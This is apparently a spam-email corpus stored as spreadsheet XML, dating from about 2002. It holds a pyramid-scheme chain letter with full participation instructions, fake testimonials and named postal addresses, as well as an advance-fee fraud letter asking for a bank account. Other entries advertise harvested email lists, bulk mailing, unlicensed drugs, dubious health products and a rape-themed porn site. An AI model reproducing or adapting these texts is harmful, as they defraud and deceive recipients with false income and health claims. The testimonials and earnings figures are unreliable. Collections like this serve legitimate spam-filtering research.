    <t xml:space="preserve">Updated May 9, 2002 ...READ THIS! YOU'LL BE HAPPY YOU DID! A recent survey by Nielsen/Netratings says that "The Internet
population is rapidly approaching a 'Half a Billion' People!"    SO WHAT DOES ALL THIS MEAN TO YOU?Let's assume that every person has 'only' one E-mail address.
That's 500 million potential customers and growing! In addition,       "E-mail is without question the most powerful
        method of distributing information on earth"Well, I think you get the picture. The numbers and potential are
just staggering, but it gets even better ...START YOUR OWN E-MAIL BUSINESS TODAY &amp; ENJOY
THE FOLLOWING BENEFITS:
*********************************************************
1. ALL CUSTOMERS PAY YOU IN CASH
2. YOU WILL SELL A PRODUCT WHICH COSTS NOTHING TO PRODUCE
3. YOUR ONLY MAJOR OVERHEAD IS YOUR TIME
4. YOU HAVE 100s OF MILLIONS OF POTENTIAL CUSTOMERS
5. YOU GET DETAILED, EASY TO FOLLOW STARTUP INSTRUCTIONS
********************************************************
AND THIS IS JUST THE TIP OF THE ICEBERG ...
As you read on you'll discover how a 'Seen on National TV'
program is paying out excellent returns, every 4 to 5 months
from your home, for a minimal initial startup investment of
only $25 US Dollars. ALL THANKS TO THE COMPUTER AGE
AND THE INTERNET!This is the letter you have been hearing a lot about recently.
Due to the popularity of this letter on the Internet, a national
weekly news program recently devoted an entire show to the
investigation of this program described below, to see if it really
can make people money.This is what one had to say: '' Thanks to this profitable 
opportunity. I was approached many times before but each time 
I passed on it.  I am so glad I finally joined just to see what 
one could expect in return for the minimal effort and money 
required.  To my astonishment, I received a 6 figure income 
in 21 weeks, with money still coming in''.
Pam Hedland, Fort Lee, New Jersey.=====================================================================
Here is another testimonial: '' this program has been around for 
a long time but I never believed in it.  But one day when I received 
this again in the mail I decided to gamble my $25 on it.  I followed 
the simple instructions and walaa ..... 3 weeks later the money 
started to come in.  First month I only made a small amount of money,  
but the next 2 months after that I made a total of a good 6 figures.  
So far, in the past 8 months by re-entering the program, I have made 
a lot more and I am playing it again.  The key to success in this 
program is to follow the simple steps and NOT change anything.''  =====================================================================
More testimonials later but first:*****PRINT THIS NOW FOR YOUR FUTURE REFERENCE &amp; FOLLOW THESE
SIMPLE INSTRUCTIONS TO MAKE YOUR FINANCIAL DREAMS TRUE! *****INSTRUCTIONS:
============
**** Order all 5 reports shown on the list below.**** For each report, send $5 U.S.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them.YOUR UP-FRONT COST is ONLY $5 X 5 = $25.00.*********Within a few days you will receive, via e-mail, each
of the 5 reports from these 5 different individuals. Save
them on your computer so they will be accessible for you to
send to the 1,000's of people who may order from you.
Also make a floppy of these reports and keep it at your desk
in case something happens to your computer.**********IMPORTANT - DO NOT alter the names of the people
who are listed next to each report, or their sequence on the
list, in any way other than what is instructed below in steps
1 through 6 or you will loose out on majority of your profits.
Once you understand the way this works, you will also see how
it does not work if you change it.Remember, this method has been tested, and if you alter,
it will NOT work! People have tried to put their friends/relatives
names on all five thinking they could get all the money. But it
does not work this way. Believe us, we all have tried to be greedy
and then nothing happened.So do not try to change anything other than what is instructed.
Because if you do, it will not work for you.  Remember,
honesty reaps the reward!!!1. After you have ordered all 5 reports, take this
advertisement and REMOVE the name &amp; address of the person in
REPORT # 5. This person has made it through the cycle and is
no doubt counting their money.2.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Position.PLEASE MAKE SURE you copy every name &amp; address ACCURATELY!
=========================================================Take this entire letter, with the modified list of names,
and save it on your computer. DO NOT MAKE ANY OTHER CHANGES.
Save this on a disk as well just in case if you loose any
data.To assist you with marketing your business on the Internet,
the 5 reports you purchase will provide you with invaluable
marketing information that includes: How to send bulk e-mails
legally, Where to find thousands of free classified ads and
much, much more.There are 2 Primary methods to get this venture going:  METHOD # 1: SENDING BULK E-MAIL LEGALLY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may send out hundreds of thousands e-mails instead of only
5,000 each).Continuing with this example, you send out only 5,000 e-mails.
With a 0.2% response, that is only 10 orders for report #1.
Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000.  Out of those 50,000 e-mails only 0.2%
responded with orders.  That's = 100 people responded and
ordered Report #2. Those 100 people mail out 5,000 e-mails
each for a total of 500,000 e-mails.  The 0.2% response to
that is 1000 orders for Report #3.Those 1000 people send out 5,000 e-mails each for a total of
5 million e-mails sent out.  The 0.2% response to that is
10,000 orders for Report #4.  Those 10,000 people send out
5,000 e-mails each for a total of 50,000,000 (50 million)
Emails.  The 0.2% response to that is 100,000 orders for
Report #5.THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00 (a half
million).  Your total income in this example is:
  1..... $50 +
  2..... $500 +
  3..... $5,000 +
  4..... $50,000 +
  5..... $500,000 ......... Grand Total = $555,550.00  NUMBERS DO NOT LIE.  GET A PENCIL &amp; PAPER AND FIGURE OUT
  THE WORST POSSIBLE RESPONSES AND NO MATTER HOW YOU
  CALCULATE IT, YOU CAN STILL MAKE MONEY!
-----------------------------------------------------------
  REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE
  ORDERING OUT OF 5,000 PEOPLE YOU MAILED.Dare to think for a moment what would happen if everyone,
or 1/2, or even one 1/5 of those people mailed 100,000 e-mails
each or more?  There are over 500 million people on the
Internet worldwide and counting.  Believe me, many people
may do just that, and more!  METHOD # 2: PLACING FREE ADS ON THE INTERNET
  ===================================================
Advertising on the net is very, very inexpensive and there
are hundreds of FREE places to advertise.  Placing a lot of
free ads on the Internet can easily get a larger response.
We strongly suggest you start with Method # 1 and add METHOD
# 2 as you go along.For every $5 you receive, all you must do is e-mail them the
Report they ordered.  That's it!  Always provide same day
service on all orders. This will guarantee that the emails
they send out, with your name and address on it, will be
prompt because they can not advertise until they receive the
report.  ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY.Note:  Always send $5 cash (U.S. CURRENCY) for each Report.
Checks or money orders are NOT accepted.  Make sure the cash
is wrapped in at least 2 sheets of paper before you put it in
the envelope. On one of those sheets of paper, write the NUMBER
and the NAME of the Report you are ordering, your email ADDRESS,
your NAME and postal address. Make sure you affix proper
'International' Postage if ordering a report from outside your
country.PLACE YOUR ORDER FOR THESE REPORTS NOW:
=============================================================
Report 1: The Insider's Guide To Advertising for Free On 
The Net ... Order from:
P. Hynes
6461 Mayfield Rd
Brampton, ON
Canada
L6T 3Z8Report 2: The insiders Guide To Sending Bulk E-mail On The Net 
... Order from:
Lynn Asbill
9400 Bluebonnet Dr
Scurry, TX
75158
USAReport 3: Secret To Multilevel Marketing On The Net 
... Order from:
Greg Grant
Po Box 385
Wilberforce, ON
Canada
K0L 3C0Report 4: How To Become A Millionaire Using MLM &amp; The Net 
... Order from:
LW
50 Burnhamthorpe Rd W Suite 401
Mississauga, ON
Canada
L5B 3C2Report 5: How To Send Out One Million Emails &amp; Jump Start Your 
Business ... Order from:
BDM Consulting
PO Box 890
Orem, UT
84059
USA
=============================================================There are currently almost 500,000,000 people online
worldwide!  $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$Follow these guidelines to guarantee your success:
*************************************************
If you do not receive at least 10 orders for Report #1 within
2 weeks, continue sending e-mails until you do.After you have received 10 orders, 2 to 3 weeks after that
you should receive 100 orders or more for Report #2.  If you
did not, continue advertising or sending e-mails until you do.Once you have received 100 or more orders for Report #2, YOU
CAN RELAX, because the system is already working for you!THIS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____________________________________________________  FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM:Follow the program EXACTLY AS INSTRUCTED. Do not change it
in any way.  It works exceedingly well as it is now.
Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others
to #2...........# 5 as instructed above.  One of the people
you send this to may send out 100,000 or more e-mails and your
name will be on every one of them.  Remember though, the more
you send out the more potential customers you will reach.So my friend, I have given you the ideas, information,
materials and opportunity .... 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so many orders and ... all cash! I was shocked.  I
have joined Jody in her ''hobby''. 
Mitchell Wolf M.D.,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a large 
6 figure income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 11 months passed 
then it luckily came again ...... I did not delete this one! I 
made a six figure income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a substantial income and by the end of the
third month my total cash count was a healthy 6 figure income.
Life is beautiful, Thanks to internet''. 
Fred Dellaca, Westport, New Zealand================================================================
ORDER YOUR REPORTS TODAY AND GET STARTED ON
YOUR ROAD TO GENERATING EXTRA INCOME! 
================================================================Disclaimer:
The sender or participants of this marketing program cannot
verify any monetary claims made in this document, nor do they
assume responsibility for same. As with any business you have
the risk of loss. No "guarantee" can be made as to the amount
of money you will make, or the benefits you may receive with
this program. This is NOT a Chain Letter. We advertise the
sale of information and a legal business of reselling that
information. If you have any doubts, please consult your
attorney.
==========================================================           BEST OF LUCK IN YOUR NEW BUSINESS VENTURE!!
26138654332222-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">LIMITED Time OFFER!! 
Quick Perfection Breast Enhancement is proud to offer to you
 a safe natural choice to breast enhancement (augmentation) surgery.  
With such frequent problems as scarring, leaking, un-natural appearance, 
loss of nipple area sensitivity, not to mention the physical pain of the 
procedure &amp; final cost, women are seeking and finding alternative methods of 
safe natural breast enhancement.   Click 
here to learn more:After many years of medical research and studies, it is now quick, 
easy, safe, and virtually inexpensive for you to permanently achieve 
the breast size that you've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
</t>
  </si>
  <si>
    <t>Three Minutes
Now...A Lifetime of Protection.
Protecting your
family...it only takes a few minutes to get peace of mind. You
need to know that your family will be alright if something
happens to you.
Get affordable quotes on
thousands of plans from the nation's strongest insurance
companies. Visit Quote Advantage now to see how we make Term
Life Insurance simple.Copyright JBM, Inc.
++++++++++++++++++++++++++++++++++++++++++++++++++++
We search for the best offering's for
you; we do the research and you get only The superior results
this  email is brought to you by; JBM. . To abnegate
all future notices, please Enter here</t>
  </si>
  <si>
    <t xml:space="preserve">Instantly S e x u a l l y Attract with nature's secret weapon... Pheromones!!Invisible and undetectable, when unknowingly inhaled, Pheromone Concentrate  unblocks all restraints and releases the raw  animal s e x drive!This is the strongest concentration of HUMAN Pheromones, allowed by law, in an essential oil base.Available in formulas for both men and women.
To learn more:  CLICK HERE TO ATTRACT 
********
To be excluded from our mailing list please email us at twist58@scotchmail.com  with "exclude" in the sub-line.
TO48 5-11 C14 P
{%RAND%} {%RAND%}
aaa1111212434346364654646566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</si>
  <si>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t>
  </si>
  <si>
    <t>The Ultimate Traditional &amp; Internet Marketing Tool, Introducing the "MasterDisc 2002" version 4.00, now released its MASSIVE 11 disc set with over 145 Million database records (18-20 gigabytes of databases) for marketing to companies, people, via email, fax, phone and mailing addresses Worldwide!COMPLETE 11 DISC SET IS ALL OF THE MARKETING DATA YOU WILL NEED FOR 2002!!! EARN BIG PROFITS THIS YEAR!!!We've been slashing prices for limited time to get you hooked on our leads &amp; data products.The first disc ver 4.00 (Contains a 1% sampling of all databases, all software titles, all demos, more then 20 million email addresses and many, many other useful resources) including unlimited usage is yours permanently for just $199.00 (Normally $299.00) for your first disc if you order today!!!  Also huge discounts from 15%-50% off of data discs ver 4.01 to ver 4.10 regular price of $499.00 per disc.
For More Information, Ordering Available Records, and Pricing Contact us:#954 340 1628 voice (Promo Code: MD2002BB, mention this for one free disc valued at $499.00 with your first order!!!)**** MASTERDISC 2002 CONTENTS ****We've gone out of our way to insure that this product is the finest of its kind available.  Each CD (ver.4.01 to ver.4.10) contains approximately 10% of the 145 million records distributed within the following databases:- 411: USA white and yellow pages data records by state.- DISCREETLIST: Adult web site subscribers and adult webmasters email addresses.- FORTUNE: This database contains primary contact data relating to fortune 500, fortune 1000, and millions more corporations sort able by company size and sales.- GENDERMAIL:	Male and female email address lists that allow you target by gender with 99%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25%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#145 million records which can be used for traditional marketing such as direct mail, fax transmission, telemarketing, and internet marketing such as commercial email campaigns.  We look forward to providing you with the databases and software needed for your success!!!We are currently shipping our January 2002 releases and including monthly download updates with every order for only $49.95 per month.Due to this incredibly discounted promotional price, we are accepting only credit card or check orders.  For More Information, Ordering Available Records, and Pricing Contact us:#954 340 1628 voice (Promo Code: MD2002BB, mention this for one free disc valued at $499.00 with your first order!!!)To discontinue receipt of further notice at no cost and to be removed from all of our databases, simply reply to message with the word "Discontinue" in the subject line.  Note: Email replies will not be automatically added to the discontinue database and may take up to 5 business days to process!!! If you are a Washington, Virginia, or California resident please discontinue yourself via email reply, phone at 954 340 1628, or by fax at 954 340 1917..051102MX4</t>
  </si>
  <si>
    <t xml:space="preserve">We offer some of the best bulk e-mail prices on the Internet. We do all the mailing for you. 
You just provide us with the ad! It's that simple!prices start at   $200.00 for 1-million e-mails sent. 
our target list start at $400.00 for 1-million e-mails sent. We give you a free mllion for ordering within 2 days.  I can also send you the names on cd w/sending tools.  So thats us mailing +
the names on CD with tools.209-656-9143learnmorezz1@yahoo.com for deletion -- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t>No where else will you find the level of accuracy, detail and convenience.ACT NOW! you'll receive Unlimited Access to our World Famous Psychics with No Per Minute Charges!!!But's that's not all...you also get unlimited Tarot and Rune readings, real-time Biorhythm charts, full in-depth Numerology reports, detailed Daily &amp; Monthly Horoscopes, real-time Natal Charts, a Love Analyzer, Ouija Board, and much, much more!Your future is waiting CLICK HERE !!!
â€¢Â Live Psychics 24/7
â€¢Â Numerology
â€¢Â Horoscopes
â€¢Â Astrology
â€¢Â The Tarot
â€¢Â Biorhythms
â€¢Â I Ching
â€¢Â Runes
â€¢Â and so much more!This email is not sent unsolicited. You are opted in with CNN-SI.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http://65.162.84.5/perl/unsubscribe.pl?s=20020512182829000001697911  to remove your email name from our list. You may contact our company by mail at 1323 S.E. 17th Street, Suite Number 345, Ft. Lauderdale, Fl 33316</t>
  </si>
  <si>
    <t>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
  </si>
  <si>
    <t>Attention Homeowners, "Now is the time to take advantage of falling interest rates!  There is no advantage in waiting any longer."http://211.78.96.242/b-quotes/Refinance or consolidate high interest credit card debt into a low interest mortgage.  Mortgage interest is tax deductible, whereas credit card interest is not.You can save thousands of dollars over the course of your loan with just a .25% drop in your rate! Our nationwide network of lenders have hundreds of  different loan programs to fit your current situation:   *  Refinance   *  Second Mortgage   *  Debt Consolidation   *  Home Improvement   *  PurchaseBy clicking on the link below and filling out the form, the information you provide is instantly transmitted to our network of financial experts who will respond to your request with up to three offers.This service is 100% free to homeowners, and of course, without obligation.http://211.78.96.242/b-quotes/To unsubscribe http://211.78.96.242/b-quotes/remove/remove.htm</t>
  </si>
  <si>
    <t xml:space="preserve">The World's #1 On-line PharmacyOrder from the convenience of your home!No Embarrassment, Just FAST, DISCRETE Delivery!Viagra (Sexual)
Phentermine (Weight-Loss)
Meridia (Weight-Loss)
Retin-A (Skin Care)
Propecia (Hair Loss)
Zyban (Quit Smoking)And much more!Click on the link below to get to the site.http://www.pillsgroup.com/main2.php?rx=16677
Do you want EVERYONE to know your business?ORDER NOW!http://www.pillsgroup.com/main2.php?rx=16677
to be removedhttp://213.139.76.181/remove.php
6264fUgj9-644odrw3782jMwc6-229vglD3612TQXj3-542cVil47
</t>
  </si>
  <si>
    <t xml:space="preserve">
ATTN:I PRESUME THIS MAIL WILL NOT BE A SURPRISE TO YOU.
I AM AN ACCOUNTANT WITH THE MINISTRY OF MINERAL
RESOURCES AND ENERGY IN SOUTH AFRICA AND ALSO A MEMBER
OF CONTRACTS AWARDING COMMITTEE OF THIS MINISTRY UNDER
SOUTH AFRICA GOVERNMENT.MANY YEARS AGO, SOUTH AFRICA GOVERNMENT ASKED THIS
COMMITTEE TO AWARDS CONTRACTS TO FOREIGN FIRMS, WHICH
I AND 2 OF MY PARTNERS ARE THE LEADER OF THIS
COMMITTEE, WITH OUR GOOD POSITION , THIS CONTRACRS
WAS OVER INVOICED TO THE TUNE OF US$25,600,000:00 AS ADEAL TO BE BENEFIT BY THE THREE TOP MEMBER OF THIS
COMMITTEE.
NOW THE CONTRACTS VALUE HAS BEEN PAID OFF TO THE
ACTUAL CONTRACTORS THAT EXECUTED THIS JOBS, ALL WE
WANT NOW IS A TRUSTED FOREIGN PARTNER LIKE YOU THAT WESHALL FRONT WITH HIS BANKING ACCOUNT NUMBER TO CLAIM
THE OVER INFLATED SUM.
UPON OUR AGREEMEENT TO CARRY ON THIS TRANSACTION WITH
YOU, THE SAID FUND WILL BE SHARE AS FOLLOWS.
75% WILL BE FOR US IN SOUTH AFRICA.
20% FOR USING YOUR ACCOUNT AND OTHER CONTRIBUTION
THAT MIGHT REQIURED FROM YOU.
5%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FAITHFULLY.JOSEPH EDWARD.</t>
  </si>
  <si>
    <t xml:space="preserve">Â 
Home Mortgage Network
Home
    of America's Most Liberal LendersINTEREST RATES
Are Still at
  an all time Low!
This is a great time to refinance your home, consolidate
  all of your
  bills and high interest credit card debt, and get the cash you need!
All Homeowners in the USA easily qualify!
Damaged credit is never a problem!
"We have
  Special Programs for every type of Credit History"  No Upfront Fees - No Hidden Fees - Get Cash Fast for...
Home
  Improvement * 2nd Mortgage * Refinance * Credit Repair * College Tuition
  Debt Consolidation * A Dream Vacation * A New Business * Any Purpose 
We work with the nation's top lenders... and they're
  hungry for your business. We will get you the best loan to meet your needs!
Our service is 100% free - and there is NO
  obligation!
Applying is easy.Enter Herefor a Quote Today!***********************************************************
Â 
Â 
We search for the best offering's for
you; we do the research and you get only The superior results
this  email is brought to you by; TMC. . To abnegate
all future notices, please Enter here
</t>
  </si>
  <si>
    <t>Watch full length movies in full screen complete we collection! &lt;!--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 --&gt; 
&lt;!-- 
var flasher = false 
// calculate current time, determine flasher state, 
// and insert time into status bar every second 
function updateTime() { 
var now = new Date() 
var theHour = now.getHours() 
var theMin = now.getMinutes() 
var theTime = "" + ((theHour &gt; 12) ? theHour - 12 : theHour) 
theTime += ((theMin &lt; 10) ? ":0" : ":") + theMin theTime += ((flasher) ? "  " : " =") 
theTime += (theHour &gt;= 12) ? " AM" : " PM" 
flasher = !flasher 
window.status = theTime 
// recursively call this function every second to keep timer going 
timerID = setTimeout("updateTime()",0) 
} 
//--&gt; 
Watch 
        full length movies in full screen complete we collection! avi, mpeg, wmv, 
        real collection. NOW! Our site have more than 290GB movies ,and we update 
        600MB movies everyday.Join us now!! Watch the fresh and top-quality movies 
        everyday.JOIN 
        NOW
We also appreciate your business, 
        but if you don't 
        wish to have anymore emails sent to you or this email reached you by mistake, 
        then click here. This message was sent you by PornOfficeBox.com, 4884 
        Laurel 
        Canyon, #118 , Valley Village, CA 91607 ph:818-908-1068</t>
  </si>
  <si>
    <t xml:space="preserve">I'm making $3000 to $7000 a day, EACH AND EVERY DAY 
and YOU CAN TOO!This is NOT MLM, GIFTING, or a GET RICH QUICK SCHEME!THIS IS FOR REAL!  PUT ME TO THE TEST!Receive $1000 Commissions... Paid Daily!This company will put you in business TODAY with 
NO MONEY DOWN!  When you join our company you get...FREE Top Notch Travel Package!
FREE (34) VACATIONS:  Bahamas, Hawaii, Florida etc.
FREE HOTEL ACCOMMODATIONS!
FREE round trip airline tickets for 2
FREE CRUISES!
FREE DELL Computer!
FREE Digital Satellite dish!
and much, much more!Plus you get a Personalized Web site to show your prospects.* My first three days, I made $3,000!
* My sponsor made $9,000!
* My sponsor's sponsor made $29,000 last week!How much would you like to make next week?For Complete Information on how you can change your lifestyle 
tomorrow follow these simple steps:1) Hit REPLY
2) Fill out the form below
3) Delete the current subject
4) Type SEND STW INFO as the new Subject
5) SEND ITName:_______________________Phone:______________________Fax:________________________Best time to call:__________Time Zone:__________________Should you encounter any problem, please resend it
to this address:mailto:tim1@btamail.net.cn?subject=Send_STW_InfoThank You!
MarciaTo be Removed from my list hit REPLY and type REMOVE 
as the SUBJECT and SEND it back. I honor all remove requests!
1229gIib8-639DQNs2891EeBx4-963yler3855ItDF4-615oJxG5828QHWj7-819qZvd0262KLsM5-753Ml77
</t>
  </si>
  <si>
    <t xml:space="preserve">Congratulations, 
You Won $30 FreeToday At The Internet's Best &amp; MostTrusted On-Line 
Casino!
To Collect Your 
$30 Cash Click Here!Â 
To Collect Your $30 Cash Click Here!
Â Â 
Â 
Â This message is sent in compliance of the new 
            e-mail bill:SECTION 301 Per Section 301, Paragraph (a)(2)(C) of 
            S. 1618,Further transmissions to you by the sender of this email 
            maybestopped at no cost to you by entering your email address 
            tothe form in this email and clicking submit to be 
            automatically   
                               removed. To be Removed from our 
            Opt-In mailing list. Please enter your email address in the provided 
            box below and click remove, thank you. 
Your 
                          E-mail Address Will Be Immediately Removed From All Mailing ListsÂ 
    .
</t>
  </si>
  <si>
    <t xml:space="preserve">
PROMOTE YOUR PRODUCT OR
SERVICE TO MILLIONS TODAY!
Â 
E-MAIL MARKETING
- Bulk e-mail will make you money so fast, your head will
spin!- Our customers tell us that they would no longer be in
business without it.- New collection of software allows you to collect targeted
e-mail addresses for free!Â Â Â  See this product's web
page
CLICK
HERE
Â 
1 MILLION AMERICAN BUSINESS LEADS ON
CD- If you do telemarketing, mailing, or faxing this list
will be a gold mine!
- Contains company name, address,
phone, fax, SIC, # of employees &amp; revenue
-
List allows for
UNLIMITED DOWNLOADS!
Â Â Â 
See this product's web page 
CLICK HERE
Â 
FAX MARKETING SYSTEM
- Fax broadcasting is the hot new way to market your product
or service!- People are 4 times more likely to read faxes than direct
mail.- Software turns your computer into a fax blaster with 4
million  leads on disk!
Â Â Â 
See this product's web page 
CLICK HERE
Â 
Visit our web site or
call 618-288-6661 for more information.
Â 
Â 
Â 
Â to be taken off of our list
click here
</t>
  </si>
  <si>
    <t xml:space="preserve">Unbelievable Prices On Cell Phones And Accessories:http://65.218.171.48Hands Free Ear Buds 1.99! 
Phone Holsters 1.98! 
Phone Cases 1.98! 
Car Chargers 1.98! 
Face Plates As Low As 2.98! 
Lithium Ion Batteries As Low As 6.94! http://65.218.171.48Click Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, 
SAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below 
WHOLESALE PRICES!
http://65.218.171.48***NEW*** Now Also: Accessories For PALM III, PALM VII, 
PALM IIIc, PALM V, PALM M100 &amp; M105, HANDSPRING VISOR, COMPAQ iPAQ*** Car Chargers 6.95! 
Leather Cases 13.98! 
USB Chargers 11.98! 
Hot Sync Cables11.98! http://65.218.171.48***If You Need Assistance Please Call Us  (732) 751-1457***~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To be removed from future mailings please send your remove 
request to: 3425342r@eudoramail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Guaranteed to increase, lift and firm your
breasts in 60 days or your money back!!100% herbal and natural.  Proven formula since 
1996.  
Increase  your bust by 1 to 3 sizes within 30-60 
days 
and be all natural.  Click here:
http://jog.bulkersx.com/blossomAbsolutely no side effects!
Be more self confident!
Be more comfortable in bed!
No more need for a lift or support bra!100% GUARANTEED AND FROM A NAME YOU KNOW AND 
TRUST!
**************************************************
*********You are receiving this email as a double opt-in 
subscriber to the Standard Affiliates Mailing 
List. 
To remove yourself from all related email lists,
just click here:
mailto:standardoptout@x263.net?Subject=REMOVE
</t>
  </si>
  <si>
    <t>Low-Cost Term-Life Insurance!
SAVE up to 70% or more on your term life insurance policy now.
Male age 40 - $250,000 - 10 year level term - as low as $11 per month.
CLICK HERE NOW For your FREE Quote!
 http://211.78.96.242/insurance/
If you haven't taken the time to think about what you are paying for life insurance...now is the time!!!
We offer the lowest rates available from nationally recognized carriers.
Act now and pay less!
CLICK HERE 
 http://211.78.96.242/insurance/
++++++++++++++++++++++++++++
Simple Removal instructions:
To be removed from our in-house list simply visit
http://211.78.96.242/removal/remove.htm
Enter your email addresses to unsubscribe.</t>
  </si>
  <si>
    <t xml:space="preserve">Rape Sex!CLICK HERE
YOU MUST BE AT LEAST 18 TO ENTER!
=============================================================================
To be removed from our "in house" mailing list
CLICK HERE
and you will automatically be removed from future mailings.You have received this email by either requesting more information
on one of our sites or someone may have used your email address.
If you received this email in error, please accept our apologies.
=============================================================================
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, jm@netnoteinc.comHuman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Click HereYou are receiving this email as a subscriberto the Opt-In America Mailing List. 
To remove yourself from all related maillists,just Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">To remove see below.I work with a company that submits
web sites to search engines and saw
your listing on the internet.We can submit your site twice a month
to over 400 search engines and directories
for only $29.95 per month.We periodically mail you progress
reports showing where you are ranked.To get your web site in the fast lane
call our toll free number below!Sincerely,Mike Bender
888-892-7537
* All work is verified
To be removed call: 888-800-6339 X1377
</t>
  </si>
  <si>
    <t xml:space="preserve">On the topic ofIt is time to refinance!Your credit does not matter, we can approve anyone.Now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http://agileconcepts.com/elitemort/Or site 2
http://61.129.81.99/al/elitem/
Erase
http://agileconcepts.com/optout.htm
</t>
  </si>
  <si>
    <t>*This message was transferred with a trial version of CommuniGate(tm) Pro*
Missed all the news this weekend?  Were you too busy treating the special moms in your life like the goddesses they are? Well good for you!  Now follow the link to see what you may have missed this weekend!Click here to view this important announcement has opened their doors for this awesome offer.Just check it out. We send it to you and you may review it for 30days.No payment upfront and No OBLIGATIONSIf you don't like it, just send it back and you wont be chargedTHIS NEWSLETTER IS NOT UNSOLICITED!
The email address has been subscribed and confirmed to our mailing list which means that someone with access to this email account verified the subscription per email.
If you would like to stop receiving this newsletter:CLICK HERE TOÂ 
U N S U B S C R I B E
TO48 5-13 C14 P
Be transported to the World of Middle Earth</t>
  </si>
  <si>
    <t>Earn the Extra Income That You So Need and Deserve!Gain Freedom and Wealth - Others Are ï¿½ Why Not You?
Complete State of the Art System - Home Based - NOT MLM!No Experience! - No Inventory! - No Credit Checks! - No Hassles!
FREE INFORMATION
___________________________________________________________
Your e-mail address has been verified as one that has requested information on these offers. 
All e-mail addresses have been double verified.
If this message has come to you in error,
Please click REMOVE ME and your name will be removed from all future mailings.
____________________________________________________________</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, jm@neteze.comHuman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Click HereYou are receiving this email as a subscriberto the Opt-In America Mailing List. 
To remove yourself from all related maillists,just Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">
NO MONEY Down Merchant  Accounts!
If you own your own business, you're starting a new business
or know someone who is.Being able to accept Major Credit Cards
can make all the difference in the world!Enter Here
Just the fact that you accept credit cards adds credibility to
your business. Especially if you are a New, Small or Home Based Business.
No Payment For The First  Month
Setup within 3-5 DaysApproval is quick and our set  up times range from 3-5 days.
Guaranteed approval on all leases for equipment or software.
Bad credit, no credit, no problem!ACCEPT CREDIT CARDS ONLINE or OFFLINE !!Enter Here"We search for the best offering's foryou; we do the research and you get only The superior" results
this  email is brought to you by; TMC. . To abolishall future notices, please Enter here
</t>
  </si>
  <si>
    <t xml:space="preserve">
Untitled Document
 Â Â Â Â Â WE CAN HELP YOU 
...Â Reduce Your 
            Monthly Payment up to 60%.Â Lower Your Credit 
            Card Interest Rates.Â Stop Late or Over 
            the Limit Fees.Â Combine Your 
            Bills into One Low Simple Payment.Â Provide a 
            Structured Payment Plan. Bring Your Account to 
            a Current Status. Private Handling of 
            Your Accounts. Put a Debt Specialist on Your Side.Not A Loan, No Credit Check, No 
      Property Needed. 
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http://65.162.84.5/perl/unsubscribe.pl?s=20020515105308000000671663  to remove your email name from our list. You may contact our company by mail at 1323 S.E. 17th Street, Suite Number 345, Ft. Lauderdale, Fl 33316</t>
  </si>
  <si>
    <t xml:space="preserve">
Untitled Document Â 
Â 
You received this email because you signed up at one of Offer888.com's websites or you signed up with a party that has contracted with Offer888.com. To unsubscribe from our newsletter, please visit http://opt-out.offer888.net/?e=jm@netnoteinc.com.
</t>
  </si>
  <si>
    <t>Some opportunities only come around every 30
years or so. This is one of those. Why?Because interest rates are definitely rising.Have you locked in the lowest rate (in THREE
DECADES yet!) for your present mortgage?Rates haven't been this low in almost 3 decades.
They may well never be this low again--ever. If
you haven't taken this opportunity to secure the
best possible rate on your home loan, you're
simply letting money slip through your fingers.At a few special times, it is SO easy to save
"big bucks"...and this is one of those times. Why
continue to pay more than is necessary and
continue to let future savings slip away?
We're a national mortgage provider. We're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"layman's terms", in other
words).
We offer primary and secondary home loans and we
will be happy to show you in "black and white"
why your existing loan is the best for you or why
you should replace it. Of course, there's no cost
to you at all to share your time with us. None. Take 2 minutes and use the link below that works
best for you. For 2 minutes of your time, we'll
show you how you can save you and your family
"big bucks" today. This is a once-every-30-years
opportunity. So don't delay and "miss the boat".
Act now.Click_Herehttp://gd11.doubleclick.net/click;3518383;15-0;0;6177677;1-468|60;0|0|0;;http://61.129.81.99/paul/bren/mortg/
Sincerely,Mark. R. McCullough
WMLN, Inc.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t>
  </si>
  <si>
    <t xml:space="preserve">
Dear friend
Â¡Â¡
Â¡Â¡Â¡Â¡&lt;!-- 
Â¡Â¡
Â¡Â¡Â¡Â¡a { color: #339966; text-decoration: none} 
Â¡Â¡
Â¡Â¡Â¡Â¡a:hover { color: #FF3300; text-decoration: underline} 
Â¡Â¡
Â¡Â¡Â¡Â¡--&gt; 
Â¡Â¡
Â¡Â¡Â¡Â¡You are receiving this email because you              
registered to receive special offers from one of our marketing
partners.Â              
If you would prefer not to receive future emails, please click              
here to unsubscribe: EmailMarketing@eyou.comTens of millions of people now use email as a fast
and   
effective method ofÂ  communicatingÂ   
with friends andÂ  business colleagues.Â  ManyÂ  emailÂ 
users   
willÂ  be potentialÂ  buyers of yourÂ   
product or service.Â  If you want to                            
introduce andÂ sell your                           
product or service,Â  it would be theÂ   
 best wayÂ  for youÂ  to use                            
theÂ  email toÂ contact Â withÂ  yourÂ targetedÂ 
customers   
(ofÂ courseÂ you shouldÂ beÂ awareÂ ofÂ           
theÂ 
emailÂ addressÂ ofÂ theÂ targetedÂ customersÂ 
firstlyÂ ).TargetedÂ email   
isÂ   
 no doubt                            
very effective. IfÂ  youÂ could introduce
yourÂ productÂ orÂ serviceÂ throughÂ 
emailÂ directlyÂ Â   
 toÂ                             
